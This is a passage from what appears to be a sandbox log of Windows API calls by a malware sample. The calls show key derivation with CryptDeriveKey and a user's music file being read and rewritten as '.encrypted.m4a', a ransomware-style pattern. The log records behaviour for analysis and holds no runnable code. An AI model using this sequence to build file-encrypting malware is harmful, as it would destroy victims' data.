hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.505] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0037.505] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.505] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.505] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.505] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.505] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.505] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.505] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0037.505] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.505] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.505] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0037.505] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.505] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.505] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0037.505] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.505] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.506] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0037.506] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.506] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.506] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.506] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.506] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.506] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.506] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.506] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0037.506] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.506] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.506] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0037.506] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.506] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.506] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.506] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.506] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0037.506] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.506] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.506] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0037.507] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.507] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.507] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0037.507] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.507] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0037.507] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.507] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0037.507] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.507] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0037.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0037.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0037.507] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.507] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.507] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0037.507] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.507] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c22c0 | out: hHeap=0x770000) returned 1 [0037.507] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.508] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.508] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.508] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0037.508] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0037.508] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.508] CryptDestroyHash (hHash=0x7c2240) returned 1 [0037.508] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.508] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.508] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0037.508] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0037.508] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.508] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6VvYzvePP1.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\6vvyzvepp1.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.508] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.508] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0037.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0037.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0037.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0037.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0037.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0037.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0037.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0037.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0037.509] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0037.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0037.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0037.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0037.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0037.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0037.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0037.509] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0037.509] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0037.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0037.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0037.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0037.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0037.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0037.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0037.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0037.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0037.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0037.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0037.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0037.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0037.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0037.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0037.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0037.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0037.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0037.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0037.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0037.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0037.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0037.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0037.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0037.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0037.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0037.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0037.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0037.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0037.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0037.526] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0037.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0037.526] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0037.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0037.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0037.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0037.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0037.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0037.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0037.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0037.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0037.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.526] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0037.526] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0037.526] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music")) returned 0x11 [0037.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0037.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0037.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0037.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0037.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0037.526] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0037.526] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0037.526] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0037.526] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0037.526] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6VvYzvePP1.encrypted.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\6vvyzvepp1.encrypted.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0037.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0037.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0037.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0037.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0037.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0037.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0037.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0037.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0037.527] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0037.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0037.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0037.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0037.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0037.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0037.527] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0037.527] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0037.527] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0037.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0037.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0037.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0037.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0037.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0037.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0037.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0037.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0037.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0037.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0037.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0037.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0037.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0037.528] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0037.528] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x275a, lpOverlapped=0x0) returned 1 [0037.529] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0037.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0037.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0037.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0037.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x275a) returned 0xac0018 [0037.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0037.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0037.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0037.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0037.530] HeapFree (in: 